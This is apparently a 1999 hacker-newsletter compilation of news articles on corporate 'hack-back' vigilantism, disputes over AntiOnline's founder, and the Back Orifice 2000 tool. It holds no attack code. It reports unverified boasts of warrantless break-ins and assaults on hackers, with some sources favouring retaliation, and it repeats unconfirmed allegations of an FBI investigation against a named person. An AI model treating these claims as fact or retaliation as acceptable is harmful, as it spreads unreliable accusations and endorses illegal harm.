From HNN http://www.hackernews.com

contributed by cult_hero

Lou Cipher discusses his experiences of confiscating computer equipment and B&E all without a warrant.
This information security 'professional' claims to have tracked cyber intruders to their homes and then paid them an unannounced visit complete with baseball bat. Claiming that 'self defense' is the only option available to him and the companies he works for, Lou Cipher brazenly takes the law into his own hands with little regard for the consequences. HNN has serious doubts about the validity of these claims. We would like to hear from anyone who has been the target for any such illegal home invasion.

MSNBC - Bob Sullivan on September 28, 1999
http://www.msnbc.com/news/311611.asp

CNN - Original Story by Winn Schwartau on January 12, 1999
http://cnn.com/TECH/computing/9901/12/cybervigilantes.idg/index.html

MSNBC;

Vigilante justice in cyberspace
When companies want swift action against hackers, they don’t always call the law

By Bob Sullivan
MSNBC

Sept. 27 - You’re a bank, and you think someone is trying to hack into your computer system. Where do you turn? Law enforcement offers little help: agencies are overworked and understaffed, and you risk public embarrassment if word gets out. Apparently, there’s another option. You might decide to take the law into your own hands. Which means you might call a man known as Lou Cipher. Lou says he’s spent the last 10 years working for Fortune 500 companies, turning the tables on computer intruders, performing what some have called vigilante justice in cyberspace.

CIPHER, A PSEUDONYM of his own choosing, says he retired from a 15-year career as a computer consultant in 1990. By then, he had already started his life as a hacker for hire. In the past 10 years, he says he’s been hired over 50 times by big U.S. firms, mostly financial institutions, looking to get hackers off their back. He says fees now start at $100,000 for new clients, with no promises of success. He and his associates often take on their tasks by bridging from the virtual world to the physical.
That means breaking into the same computers a hacker has hijacked, chasing the trail through cyberspace, obtaining a real-world address and paying a real-life visit. Cipher says he’s even broken into homes and stolen hackers’ computers to teach them a lesson. He gives the machines back after recovering any stolen information.

"I am engaged in the protection and regaining of stolen assets because of the inability of government to provide adequate protection and prosecution," Cipher says. And that includes, he admits, breaking laws himself. His defense: It’s self-defense. "You can call the FBI right now and say a person just got off with a database of customers. What is the FBI going to do?"

The increase in technology crime has given fits to law enforcement agencies who find they don’t have the necessary skills to keep up with an army of new criminals, emboldened by the anonymity the Net provides. Even when federal agents act, justice can be slow. It took almost six months for the recent nationwide FBI hacker crackdown to produce an arrest. So Cipher, and some say other such corporate vigilantes, take the law into their own hands.

Still, to call breaking into someone else’s home an act of corporate self-defense would likely be considered a stretch in court. "I don’t see that argument holding water," said cyberlaw expert Dorsey Morrow. "It would be a dangerous thing for a corporation to do. The potential liability is incredible."

Particularly if vigilantes hit the wrong target. That’s the concern of computer consultant Brian Martin, who maintains the popular hacker information site attrition.org. "So Lou and his gang roll up on this house and know the intruder dialed from there. They bust in and terrorize an elderly couple. Oops!" Martin said. "How could they have been so wrong? Because the hacker used a laptop from the phone box outside their house. That scenario scares me."
Cipher was first identified in public when information warfare expert Winn Schwartau used his name in a column for Network World in January. Claims of baseball bat-wielding vigilantes stirred skepticism in the underworld, and neither Martin nor Space Rogue, who maintains the Hacker News Network Web site, say they’ve ever heard of a hacker being visited by any private security agent.

"Considering the size of this community, if he has visited more than 10 people I am sure word would have leaked," Rogue said. But he added, "There have been rumors floating around for a few years of corporations with their own internal security taking matters into their own hands."

That has law enforcement agencies anxious enough to discuss the matter publicly. Jim Christy, special agent for the Department of Defense, debated Schwartau on the topic at the Infowarcon conference earlier this month. "I have no problem with identifying a bad guy and warning them," said Christy, who for 11 years was chief of computer crime for the Air Force Office of Special Investigations. "That’s a legitimate self-defense option for a victim. But it crosses the line when you violate the rights of others. ... It crosses the line when you break the law."

He said the key to making law enforcement agencies more effective is for more victims of computer crime to come forward. Without a backlog of cases, agents can’t demand additional resources. Companies that hire vigilantes, or who simply brush computer crime under the rug out of fear of embarrassment, only make the situation worse, he said.

But that won’t help victims today, Schwartau said, and they need somewhere to turn. "The legal community says it’s blatantly illegal," Schwartau said. Schwartau, who once shared ownership of a Web site venture with Cipher, says the legal community is being closed-minded on the topic.
"Is disarming an adversary illegal? ... You’re allowed to do repossession, which is stealing your own possessions back."

When MSNBC visited Cipher at his daytime consulting job, where he is a security adviser for a large U.S. brokerage company, Cipher said he painstakingly verifies his targets and admits sometimes he doesn’t catch them. Most of the examples he offered involved pre-emptive strikes against hackers probing financial networks, the cyber equivalent of casing a bank before a robbery. Such pre-emptive strikes have taken him as far as Eastern Europe, and even India, he said. In one case, he said college-aged hackers in the Czech Republic were worming their way toward a bank’s credit card database. Another incident involved hackers in India trying to fake an electronic funds transfer.

But sometimes, he said, he does his work entirely over the Internet. Last month he says his agents broke into the computer of a man who held a vast database of stolen credit cards. They scrambled the card numbers to render them useless. Many more of his stories are less dramatic, involving a polite curbside or coffeehouse conversation with a hacker. Often, that’s enough, he says. "They are very surprised when we come to visit, when we bridge to the physical world," he said.

CNN;

Cyber-vigilantes hunt down hackers
January 12, 1999
Web posted at: 12:19 a.m. EDT (1219 GMT)
by Winn Schwartau

From... (IDG) -- In September 1998, the Electronic Disturbance Theater, a group of activists that practices politically driven cyber civil-disobedience, launched an attack aimed at disabling a Pentagon Web site by flooding it with requests. The Pentagon responded by redirecting the requests to a Java applet programmed to issue a counteroffensive. The applet flooded the browsers used to launch the attack with graphics and messages, causing them to crash. The incident raises issues all user organizations will soon have to grapple with, if they haven't already.
When you detect a break-in, should you launch a counterattack in order to protect your network? Is law enforcement capable of stopping cybercrime and can it be trusted to keep investigations quiet? If not, do corporations have a right to defend themselves?

Some emboldened user organizations are answering "yes." They are striking back against hackers, sometimes with military efficiency and intensity, in an effort to protect their self-interests. In the process, they are fueling a debate over what is legal and ethical in terms of corporate vigilantism.

One end of the opinion spectrum says law enforcement agencies are generally not up to the task, so corporations have a fiduciary responsibility to protect their interests. The only question for these companies is how far they are willing to go. Will they break laws, and if so, which ones? The opposite view is corporate vigilantism is wrong: Taking the law into one's own hands only makes things worse.

The First Vigilante Corp.

Lou Cipher (a pseudonym of his choice) is a senior security manager at one of the country's largest financial institutions. "There's not a chance in hell of us going to law enforcement with a hacker incident," he says. "They can't be trusted to do anything about it, so it's up to us to protect ourselves."

Cipher's firm has taken self-protection to the extreme. "We have the right to self-help - and yes, it's vigilantism," he says. "We are drawing a line in the sand, and if any of these dweebs cross it, we are going to protect ourselves." Cipher says his group has management approval to do "whatever it takes" to protect his firm's corporate network and its assets. "We have actually gotten on a plane and visited the physical location where the attacks began. We've broken in, stolen the computers and left a note: 'See how it feels?' " On one occasion, he says: "We had to resort to baseball bats. That's what these punks will understand. Then word gets around, and we're left alone.
That's all we want, to be left alone."

A senior vice president of security at a major global financial firm speaks of the matter in military terms. He equates a hacker intrusion to a "first strike," and says defense is an appropriate response. "If you use measures to restore your services, that's defense, not offense," he says. When asked how far his company goes, he concedes only, "I am willing to defend myself."

In interviews with dozens of companies, a surprising number are seriously considering implementing "strike-back" capabilities. However, when asked, most companies would not admit they have already taken such steps. Bruce Lobree, an internal security consultant at a major financial institution, is cautious about admitting his firm uses vigilante activities and strike-back techniques. He says with a smile, "I can't answer yes or no. That's proprietary. Besides, legally we can't. But I can tell you that everything that occurs at our network perimeter and inside our networks is recorded."

A recent study, "Corporate America's Competitive Edge," conducted by Warroom Research, a competitive intelligence firm in Annapolis, Md., shows that 32% of the 320 surveyed Fortune 500 companies have installed counteroffensive software. Warroom President Mark Gembecki notes that not every company will send out thugs to enforce their firewall policies. Cyber-response is OK, he says, but Cipher's physical retaliation is "a clear and overt violation of civil rights."

Such extreme counteroffensive methods raise the hackles of even the staunchest corporate information warrior. Lloyd Reese, program manager of information assurance for Troy Systems, a technical support company in Fairfax, Va., has a criminal justice background and says physical response is illegal and "doomed to failure." Such responses will only invite further attacks - perhaps even more intense, he says. "Companies need to follow the appropriate legal process.
We already have chaos on the Internet, why should we make it worse?"

Joseph Broghamer, information assurance lead for the U.S. Navy's Office of the Chief Information Officer, goes further, saying even the Pentagon shouldn't have done what it did. "Offensive information warfare is not a good thing . . . period. You want to block, not punish," he says. "There is no technical reason to react offensively to a hacker attack." His opinion is shared by precious few.

As part of its information security practice, Ernst & Young has been asked about strike-back capabilities and how hostile perimeters might be used for defense. Dan Woolley, national leader of market development for the firm, says he knows of "companies in finance, insurance and manufacturing that are developing and deploying the capability to aggressively defend their networks." He is quick to point out, however, "We don't do it for ourselves even though we are attacked regularly."

The questions security software vendors and consultancies like Ernst & Young are now grappling with are wrenching: Should they develop offensive software, offer it to their clients, deploy it and support it? And if so, how open should they be about it?

How they do it

It's easy to understand why companies are interested in the idea of corporate vigilantism. Even the best layers of defense - firewalls, passwords and access control lists - can't work alone for many reasons. Among them:

- Network topology, users and software are constantly changing. There is no way to keep up.
- New vulnerabilities are found - and exploited - daily.
- A small number of individuals with little technical skill can launch massive online attacks.

Once an attack is detected, corporate vigilantes have various methods of evening the score.
The Navy's Broghamer argues that sometimes the best response to an attack is to shut down the network connection altogether, although he acknowledges the Navy is not as sensitive to uptime and customer perception as the private sector.

Another approach is to send a strongly worded message to the source IP address or to an ISP in the path. Traceroute is a tool that can identify source IP addresses. But you have to get the assistance of ISPs down the line to trace additional hops on the Internet, because each hop has to be covered in order to find the real source. That's all legal, but you may need to pressure the ISP into working with you quickly to identify the next hop in the chain. Once you collect this data, it can be handed over to law enforcement officials - who may or may not react.

In 1994, Secure Computing, a security vendor in Roseville, Minn., introduced Sidewinder, a novel firewall with strike-back capabilities. If it senses an attack, it launches a daemon that will trigger the offensive techniques of your choice. Other companies indicate they will soon be offering a range of strike-back products.

A company crosses the line when it responds by unleashing a denial-of-service attack against an intruder, as the Pentagon did. This can be done via massive e-mail spamming, the Ping of Death and hostile Java applets. No matter what offensive mechanism you choose, the trick is to identify the culprit before returning fire. Should you fail to recognize that the attacker spoofed the identity of another company, you may find yourself attacking J.C. Penney, NBC or General Motors. Innocent companies would not take kindly to that sort of activity - no matter the reason - and ISPs don't appreciate being the vehicle for Internet-based attacks.

Indeed, one of the big dangers with corporate vigilantism is how easy it is to overreact to an apparent attack.
In spring 1997, one of the Big Six accounting firms used scanning tools from Internet Security Systems (ISS) to assess the security of a major ISP that controlled a huge amount of Internet traffic. When a network administrator on duty at the ISP noticed a thousand simultaneous connections to his firewall, he reacted quickly and shut down several routers. "His manual reaction took down 75% of the Internet," says Tom Noonan, president of ISS. "Anyone using Sprint at that time was in a world of hurt."

Even those with a strong inclination for vigilantism note that counteroffensive responses are fraught with danger. "Talk to your lawyers," Troy Systems' Reese advises. "Keep in mind that your strike back has to go through a long path, and you might do damage at any place along the way." Retribution can cause a hair-trigger response that could cause damage to systems in the path from you to the attacker.

"You really have to understand what you're doing," says Ray Kaplan, a senior information security consultant with Secure Computing. "Your first response might invite further attack, exactly the opposite of what you intended. You have to consider your firm's public relations posture and how the Internet community as a whole will react to your actions."

Don't ask, don't tell

As for how law enforcement will view vigilantism, the answer from many companies is a resounding, "Who cares?" Vigilantism is emerging as a response to the intense frustration people feel with law enforcement authorities they view as simply not up to snuff. Complaints from top firms in the U.S. range from downright ineffectiveness ("clueless" is an oft-repeated word) to a lack of staff, lack of funding, courts that are too crowded with cases and the snail-like speed at which typical law enforcement investigations run.
"One reason you see vigilantism is because law enforcement doesn't get the job done," says Fred Cohen, president of Fred Cohen and Associates and principal scientist at Sandia National Laboratories. "Law enforcement might investigate if you have a lot of political clout and you do all of the leg work." Companies are also fearful of what might happen if they do bring in law enforcement. "It's a hell of a situation when victim companies are more fearful of the FBI than they are of the attackers," says Michael Vlahos, senior fellow at the U.S. Internet Council. He echoes the worry that sensitive corporate information will not be protected if handed over to law enforcement. "Law enforcement is helpless," ISS's Noonan maintains. "It's not like Israeli fighters who train every day for every contingency. Conventional law enforcement just can't match the skills needed. Besides, you can't trust law enforcement to keep your secrets from becoming public knowledge." Predictably, law enforcement does not favor the vigilante view - at least publicly. "If someone were to attack us, we are not encouraged to swat back," says Lt. Chris Malinowski of the New York Police Department, who specializes in cybercrime. "If companies take any of these proactive defensive steps, they are taking a big chance, subject to criminal prosecution." Dave Green, deputy chief of the Computer Crimes and Intellectual Property Section for the U.S. Department of Justice, says he relates to the frustration over law enforcement's inability to respond, but adds that his department can only recommend protective measures. Yet he stops short of advising against corporate vigilantism outright. When asked if companies should hack back at attackers, Green responds, "no comment," as he does to questions as to what could legally be considered an attack. "But I can say that law enforcement is gearing up and is much better equipped to deal with cybercrime," he adds. 
When they are not speaking for attribution, law enforcement authorities of all stripes go further than Green. Local police, state police, the FBI, Secret Service, Interpol and Scotland Yard members all say the same thing - unofficially: "We can't handle the problem. It's too big. If you take care of things yourself, we will look in the other direction. Just be careful."

Security consultant Lobree seems to understand the police mentality and applies the red light theory to cybervigilantism. "Suppose it's the dead of night on a country road, and you come upon a stop light. You can see for miles in all directions. Are you going to run the light even knowing there is virtually no chance of being caught?" Some, perhaps most, won't, because they have an innate fear of being caught. Others will forge ahead. "A lot of companies recognize that the chance of getting caught in a vigilante cyberstrike is pretty darn low," he says.

It's your call

A number of sources suggest vigilantism might be a business opportunity for a firm that wants to specialize in counteroffensive network security. "In the 1860s, law enforcement was conducted by Pinkerton, a private company," Vlahos says. Many suggest that privatization should be the case in the cyberworld as well.

The kind of offensive network security products needed to make it happen are starting to find their way into corporate tool kits and onto the Internet. But the legal challenges that coexist with hostile perimeters and counteroffensive measures are daunting. The astute company will examine every aspect of its posture before marching down the slippery slope of vigilantism. Sometimes the best defense is not to overreact. In the worst case, do nothing until a proper response can be developed. Vlahos says courts may be the place to create new laws more attuned to the technology. "This is a whole new arena, and I don't know how we can explore it without trying new approaches, even if they are technically illegal."
Cipher, the baseball-bat-bearing vigilante, is all for new approaches. "Personal persuasion is always more effective than electronic persuasion," he says. "Personal persuasion virtually guarantees that a hacker will see the error of his ways, scamper to please and turn over a new leaf."

No matter what path you choose, make sure it is well thought out and that you have your legal ducks in a row. You just might need them.

Schwartau is chief operating officer of The Security Experts, a global security consulting firm, and president of infowar.com. He can be contacted at winn@infowar.com.

@HWA

20.0 Forbes Calls AntiOnline Bluff
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

contributed by grendel

Adam Penenberg takes a close look at John Vranesevich, founder and web master of AntiOnline. The article offers a close examination of previous threats of litigation by Mr. Vranesevich and discovers just how easy it is to become a 'reliable media source'. Mr. Penenberg calls his bluff and issues a challenge to 'Go Ahead and Sue'.

Forbes
http://www.forbes.com/columnists/penenberg/
(articles change daily, check the archives... -Ed)

CyberWire Dispatch August 1999 - Referred to in Forbes Article
http://www.hackernews.com/orig/CWD0899.html

Ottawa Citizen - Mirror Referred to in Forbes Article
http://www.attrition.org/negation/ottawa.html

Forbes;

IT'S A SAD FACT, but whenever someone is cited as an expert in one publication, he is almost sure to be quoted in another--and another and another. The reason is simple: The first thing a journalist does when beginning a story is to see what else has been written on the topic. Culling sources from other news articles is a good way to get started. The problem is, few reporters check out these "experts," figuring that if a source made it into, say, The New York Times or The Washington Post, he must be reliable and, well, expert. Think of it as an extension of Howard Stern's media strategy.
Stern once said he himself first coined the term "King of All Media," figuring that the mainstream press would then start to call him that. (It did.)

How else to explain the schizophrenic emergence of twenty-year-old John Vranesevich, founder and operator of antionline.com, a web site that purports to follow the hacker scene. In the realm of mass media, "JP" has become a star, a youthful public figure who has been quoted extensively for his computer-security expertise and inside knowledge of the hacking world. But in hacker circles he is a pariah. Perhaps only his close ally, Carolyn Meinel (a.k.a. "The Happy Hacker"), inspires more vitriol. At this year's Defcon, the hacker conference held in Las Vegas, Meinel had the dubious honor of being bodily ejected from the convention hall.

It's hard to gauge just how elite JP's hacker and computer-security skills are. But we do know his web site was taken down in August when someone with an account in Russia tricked AntiOnline into downloading software that redirected its visitors to another site. The hacker, obviously not a fan of JP's, included this message: "Expensive security systems do not protect from stupidity."

And online columnist Lew Koch, of CyberWire Dispatch, interviewed JP at length, exposing vast gaps of knowledge. For instance, Koch questioned JP about AntiOnline's alleged scoop of the hack of an atomic research center last year, yet he couldn't remember which country housed the center. JP kept insisting it was Israel, and, according to Koch, called the Bombay Atomic Research Center the "B'Hadvah Atomic Research Center." When Koch corrected him, JP admitted it must have been India. JP also claims he has "semi-contractual" relationships with NASA and the Defense Information Systems Agency (DISA), yet Koch says both agencies deny this. But the mass media appears ignorant of this.
The New York Times turned to Vranesevich when it needed comment on a rash of anti-government hacks, while The Wall Street Journal Europe dubbed him an "online-security specialist." The Baltimore Sun asked for his opinion on the hack of the Johns Hopkins' medical school site. The Orange County Register invited him to bash hacker/martyr Kevin Mitnick, which he did with glee, saying that hackers don't have a clue about Mitnick's case, they "just heard it's cool to support Mitnick, and that is what they do." And the San Diego Union-Tribune dialed him up to ask about the threat of computer viruses.

Of course, JP has nothing against good press. It's the bad press that lets him unsheathe his sharpest weapon. No, not the facts; those would only get in the way. We're talking about the threat of a lawsuit.

In June, JP contacted Harvard University to complain about a computer-security web site rival called PacketStorm, which had posted some nasty pictures, along with even nastier commentary. Harvard, afraid of a lawsuit, pulled the site, which was a favorite of computer-security professionals. JP claims on his web site that he didn't explicitly threaten lawsuit, but the University certainly took it that way. A Harvard spokesman told me this was the first time Harvard had ever pulled the plug on a site for "objectionable material." (Eventually, PacketStorm found a home with Kroll-O'Gara, the big-time detective agency in New York.)

Then in July, The Ottawa Citizen ran a story about JP, reporting allegations that JP is under investigation by the FBI for "employing hackers to target high-profile sites in order to scoop the rest of the media with exclusive reporting." Vranesevich contacted the newspaper and threatened to sue. Although Mark Anderson, The Citizen's high tech editor, said he was confident in the story, the FBI would not comment whether it was in fact investigating JP or not, even though several other sources in the know insisted he was.
As a result, the Citizen removed the story from its web site, rather than face a potential lawsuit. "It's sad," Anderson says. "You're confident you have reliable information, but the threat of a lawsuit forces you to pull your story. The onus was on us to prove that Vranesevich is under investigation by the FBI, but the FBI wouldn't say it outright. Since Canadian libel law is tougher than American libel law, we felt we had no choice."

In addition, folks trolling around cyberspace say that Vranesevich has threatened them with lawsuits whenever they post anything negative about him on their web sites. I wonder what he would do if someone actually took him up on this, since lawyers are expensive and, by all accounts, JP's business is far from being a cash cow. Perhaps, after reading this, he'll even sue me.

CyberWire Dispatch;

Note: CyberWire Dispatch is a mailing list only newsletter. It is reprinted here with permission. Subscription information is at the end.

CyberWire Dispatch // August 1999 // All Rights Reserved

Jacking in from the "Pine-Sol" port:

By Lewis Z. Koch
CWD Special Correspondent

Twenty-year-old John Vranesevich calls his AntiOnline Web site "a valuable tool in the fight against 'CyberCrime'" In a call to arms, this self-anointed, junior G-man wannabe, promises to uncover, reveal and inform on hackers and other miscreants.

Out of this misguided cyber-vigilantism, arises the "denunciator" virus, which reaches its full lethality in totalitarian states but also finds a home in democratic societies as well, usually in climates of social resentment, political fanaticism, or, my personal favorite, political self-righteousness. The Denunciator virus, known also as the "Accuser" virus, destroys careers, leaves permanent scars, called "blacklists," gives rise to false alarms, warnings or contrived "cautionary tales" meant to lull or divert citizens.
The natural host for this virus is believed to be a species of the rodent called a "snitch," aka squealer, stool pigeon, informer; rat bastard.

Every delusional crusader needs a mission statement; Vranesevich is no different. This self-anointed sheriff-of-cyberspace pens this Uber-warning to hackers:

"I know that some of you are playing what you feel is a game. A game that you think you are winning. Some of you sit back and laugh at organizations like the FBI. You make sure that you provide enough information to make it obvious who you are, yet are careful not to provide enough information to actually have it proven. I have been watching you these past 5 years. I know how you do the things you do, why you do the things you do, and I know who you are."

And if you're keeping score-and you should be-you'll note that Vranesevich apparently started down this crusader road at the tender age of 15 or just about the time he figured his Johnson could be used for more than simple utilitarian bodily functions.

This not-very subtle paean to cyber-vigilantism could easily be dismissed save for the fact that Vranesevich has earned a demi-celebrity status from journalists working for publications from which we have come to expect more judicious sourcing, including, but not limited to, Matt Richtel of The New York Times, John Schwartz of The Washington Post and even, sadly, CWD's own Brock Meeks while cloaked in his alter-ego as Washington correspondent for MSNBC. And we wonder why fewer and fewer people trust the media.

Hung With His Own Rope
=====================

In his mission statement Vranesevich unequivocally states, "I've seen myself talking with people who have broken into hundreds of governmental servers, stolen sensitive data from military sites, broken into atomic research centers." Question is, can we believe him? There's his rather perplexing story about hackers breaking into an "Israeli" atomic research center.
At first, as Vranesevich tells it, when hackers told him what they had done, he "freaked" even thought the boast might be "far fetched." But these hackers sent him a "folder full of documents written in a foreign language" they claimed they had copied from the "B'Hadvah" Atomic Research Center. [Note: Vranesevich didn't know how to spell the name of the so-called research center].

"Were the documents in Hebrew or English?" I asked.

"Bengali."

When he broke the "story" on his AntiOnline web site, all media hell broke loose. "Every mainstream media started calling and questioning and calling the research center," Vranesevich said. "I had all these nuclear arms proliferation people calling. Here I am in my parent's living room, and one day, thirteen calls from anti-nuclear proliferation and pro-nuclear proliferation (sic) groups wanting to know - is this significant, what is Israel doing?"

I was still having a problem with the "Bengali" aspect to the documents. "Ah, John," I asked, "is this an Israeli research center or could it be Indian? Pakistani?"

Silence. Then Vranesevich said, "I think it's Indian. Who was the one that just did the nuclear testing?"

"That was India and Pakistan, not Israel."

"Oh, then this was India, not Israel."

Oh.

Then there's his story about changing medical records-pretty serious stuff. Can we take him at his word there?

"[I]'ve seen people change the medical records of individuals in our armed services" Vranesevich asserts in his "mission" statement. When asked about these nefarious deeds, Vranesevich works himself up into a high dudgeon about hackers breaking into sites and changing medical records. "What would have happened if medical records had been changed and a cancer patient received the wrong treatment for it?...What if I had looked into who these [hacker] guys were, a little further? What would have happened if I would have published the story?
What would have happened if CERT had come out and said medical records had been changed and a cancer patient received the wrong treatment because of it!"

I questioned him closely. "You really saw people change the medical records of individuals in our armed forces?"

"I don't mean that literally," backtracking as fast as his voice could carry him. "You see the language I was using? I don't mean literally 'I saw them do it, I saw it happen.' It's something that transgressed (sic) before. It's like we saw our country go through three wars. It doesn't mean I caused (sic) the three wars. You see what I'm saying? Or I've seen crime happen over and over again in my neighborhood. Doesn't mean I literally saw it. You know what I mean? I don't know if I'm making myself clear."

Ah, er.. right. He gave it one more chance. "Looking back in retrospect (sic). It was like actions that transgressed (sic) before. I've sort of watched the events transfold (sic) before my eyes."

Yep, that clears it up; someone get this guy an English tutor... There's more like that but after a while it gets, well, boring.

Vranesevich also claims a "semi-contractual" relationship with all kinds of official military and police types, including one with the NASA and one with the Defense Information Systems Agency (DISA). Can we believe him?

NASA says no. After checking with their databases "they could find no record of NASA having done business with Mr. Vranesevich or his company AntiOnline," reports Patricia M. Riep-Dice, NASA Freedom of Information Act Officer. According to a DISA spokesman, no such relationship exists. None. Nada.

In Other People's Words
=======================

In his grasp for distinction, celebrityhood, acclaim, Vranesevich overreaches, as he did with his claim of unethical behavior on the part of computer security expert Marcus Ranum. Ranum's "crime"? "Guilt-by-association" with two hacker groups, L0pht Heavy Industries and cult of the Dead cow (cDc).
L0pht Heavy Industries is among the finest Microsoft error-catchers in the world; it is a company with employees and it pays taxes. "cult of the Dead cow" is a group of hackers in the tradition of Yippie founders Abbie "Steal This Book" Hoffman and Jerry Rubin. The cDc promises Internet chaos, anarchy and terror; in 1968, in Chicago, Abbie Hoffman and Jerry Rubin threatened to pour LSD in the water and send Yippie studs to O'Hare airport to seduce the wives of delegates to the Democratic National Convention. If that analogy is lost on you, cut your losses now, stop reading and return to your "Internet for Dummies" workbook.

L0pht and cDc tend to despise Microsoft, but then so do a lot of people, including folks in the Justice Department. More than likely there is cross-over contact between L0pht and cDc since the two have much in common, in the same way journalists from different newspapers and television tend to hang out at the same bars, buy each other drinks and complain about the stupidity and venality of their editors.

cDc had been tinkering around the multiplicity of holes, vulnerabilities and general screw ups in the Microsoft Windows operating system. They developed a back-dooring program for Win 95, one that allowed a Trojan Horse to exploit that vulnerability. In a stroke of genius that would make a Wizard of Madison Avenue green with envy, they dubbed the program "Back Orifice."

Ranum developed a program to counteract Back Orifice and called it "Back Officer Friendly." Vranesevich claims he was "shocked, shocked" to discover that Ranum might have had conversations with hackers at L0pht, perhaps even some at cDc about Back Officer Friendly. Vranesevich's story alleged that Ranum could have even been talking with the very people at cDc who developed the exploit in the first place. So what do we have here? Collusion? Duplicity? Ethical lapse? Double-agentry?

Whom to believe?
================

Bell Labs' William R.
Cheswick, co-author with Steven Bellovin of the exemplary "Firewalls and Internet Security - Repelling the Wily Hacker," says of Ranum: "I have worked with Marcus for years. He is a strong force for Good against Evil. A security person is paid to think bad thoughts, and Marcus is quite good at it. The key is that he doesn't do the bad stuff, but uses this approach to make things safer."

Bellovin, himself a world-class computer expert, certainly doesn't equivocate. Ranum has "been a strong, positive force for Internet security, both in the sense of building useful tools and in the sense of teaching other people important principles. I've also never heard any serious question about his ethics."

"Marcus has one of the most fluent understandings of Internet security I have ever seen," says Bruce Schneier, whose books on encryption and on privacy can trigger a physical and intellectual hernia, "his ability to see threats and attacks, defenses and countermeasures, makes him one of the most valuable resources we have in the computer security world," Schneier said. Marcus' "association with the L0pht recognizes that there is considerable expertise in the hacking community that can be leveraged in the fight against computer crime. Marcus is just smarter than other people, because he realized it and figured out how to use it. No kidding; he's that good."

So you do the math: self appointed cybervigilante John Vranesevich, with his stolen "Israeli" atomic secrets written in Bengali, changed medical records that weren't changed, unsubstantiated relationships with NASA and DISA (and that's just for openers), and, on the other hand, Marcus Ranum and people like Cheswick, Bellovin, and Schneier.

The best way to deal with the "Denunciator" virus is simply silence; don't feed the hype.

========================================

EDITOR'S NOTE: CyberWire Dispatch, with an Internet circulation estimated at more than [500,000], is now developing plans for a once-a-week e-mail publication.
Every week, one of five well-known investigative reporters will file for CWD. If you think your company or organization would be interested in more information about establishing a sponsorship relationship with CyberWire Dispatch, please contact Lewis Z. Koch at lzkoch@wwa.com.

===================

To subscribe to CWD, send a message to: Majordomo@vorlon.mit.edu
No subject needed. In the first line of the message put: Subscribe CWD

To remove yourself from this list, send a message to: Majordomo@vorlon.mit.edu
No subject needed. In the first line of the message put: Unsubscribe CWD

----

From: http://www.attrition.org/negation/ottawa.html

Ottawa Dispatch;

[There is a chance this article was removed because of the legal threats made by John Vranesevich against the Ottawa Citizen. It is preserved here for posterity.]

http://www.ottawacitizen.com/hightech/990719/2623591.html

The Ottawa Citizen Online
Business Page
Monday 19 July 1999

Spy vs. spy in the hacker underworld
Network security expert is under investigation for attacks on U.S. government Web sites

Bob Paquin
The Ottawa Citizen

In the murky world of hackers and crackers, appearances can be deceptive. "White hat" good guys, working for software or security firms, have occasionally been caught moonlighting as "black hat" rogues. Such appears to be the case with John Vranesevich, a network security expert and founder of top-rated hacker Web site AntiOnline.

Mr. Vranesevich is currently under investigation by the FBI with regard to recent attacks on U.S. government Web sites. It is alleged that he may have employed hackers to target high profile sites in order to scoop the rest of the media with exclusive reporting. Mr. Vranesevich has denied the allegations.

Brian Martin, also under FBI investigation for hacking, recently released a report on his Web site (www.attrition.org/negation/special) which details a series of links between Mr.
Vranesevich and an alleged member of the hacker group Masters of Downloading, which claimed responsibility for the U.S. Senate Web site hack earlier this month. Mr. Martin, who researches hacker culture through his Web site, claims to have been tracking questionable AntiOnline reporting over the past year.

Mr. Vranesevich, 20, has over the past couple of years become one of the most widely quoted and authoritative sources on hacking and security-related information. Begun in late 1994 as a 5-megabyte high school hobby Web site, AntiOnline has since grown into a multi-domain business venture. ABC News has described it as a "Rick's Cafe in the Casablanca world of hacking." Besides reporting on hacking news, the site offers a downloadable library of hacking software tools, archives of several hacker newsletters and journals, and copies of some of the hacked pages featured in reported stories.

While growing increasingly popular with the mainstream media, however, Mr. Vranesevich has slowly built up a number of enemies among the hacker underground.

Spurred, perhaps, by an extensive FBI and U.S. Department of Justice hacker crackdown, which resulted in raids on 20 suspected hackers across six states, Mr. Vranesevich declared a dramatic change of stance, distancing himself from the subjects he covers. In a "Change in Mission" notice posted on his Web site, Mr. Vranesevich said: "Unfortunately, I've found myself looking in the mirror with disgust these past few months. Looking back, I've seen myself talking with people who have broken into hundreds of governmental servers, stolen sensitive data from military sites, broken into atomic research centres, and yes, people who have even attempted to sell data to individuals that presented themselves as being foreign terrorists ... Many times, I knew about these instances before hand, and could have stopped them."

He also claimed to have been secretly working with the U.S.
Air Force to develop a "profile of a hacker" for use in fighting "CyberCrime".

Mr. Vranesevich's message concluded with a note to the thousands of hackers who read his site: "You yell and scream about freedom of speech, yet you destroy sites which have information that disagree with your opinions. You yell and scream about privacy, yet you install trojans into others' systems, and read their personal email and files. You truly are hypocrites. All of these grand manifestos that you develop are little more than excuses that you make up to justify your actions to yourself."

Mr. Martin, on the other hand, alleges that many of the reports from AntiOnline, and subsequent follow-on reporting in other media outlets, have been exaggerated and sensationalized. "Not only had AntiOnline driven the media hype behind the stories, they put various government and Department of Defense organizations on full alert preparing for the fallout these attacks would cause," he states on his own Web site.

In detailing the relationship between Mr. Vranesevich and the alleged hacker in question, Mr. Martin notes that "the typical journalist/contact relationship did not exist, and in fact, AntiOnline may have been responsible for creating some of the news to report on ... he pays people to break into sites in order to report on it as an exclusive."

@HWA

21.0 BO2K, good or evil? The Debate Continues.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com

contributed by bradcc

Bruce Schneier, chief technology officer at Counterpane Internet Security, offers some comments on Back Orifice 2000. Is it an evil 'hacker tool' or remote administration software?

PC World
http://www.pcworld.com/pcwtoday/article/0,1510,13024,00.html

How Bad Is Back Orifice?
Hacker tool is only as malicious as the hands it falls in--but Windows users beware.

by Ann Harrison, Computerworld
September 28, 1999, 8:22 a.m. PT

Is Back Orifice simply a cool hacking tool or a malicious weapon?
Depends on who you ask. Some people think the remote administration tool for Microsoft Windows is not as malicious as it's made out to be. Bruce Schneier, chief technology officer at Counterpane Internet Security, is one of them. Computerworld reporter Ann Harrison spoke with him recently about the free open source tool, which he insists has gotten an undeservedly bad reputation.

Q: How does BO2K work?

A: There are two parts: a client and a server. The server is installed on the target machine. The client, residing on another machine anywhere on the Internet, can now take control of the server. Perfectly respectable programs, like pcAnywhere or Microsoft's Systems Management Server [SMS], do the same thing. They allow a network administrator to remotely troubleshoot a computer. If the server is installed on a computer without the knowledge or consent of its owner, the client can effectively "own" the victim's PC.

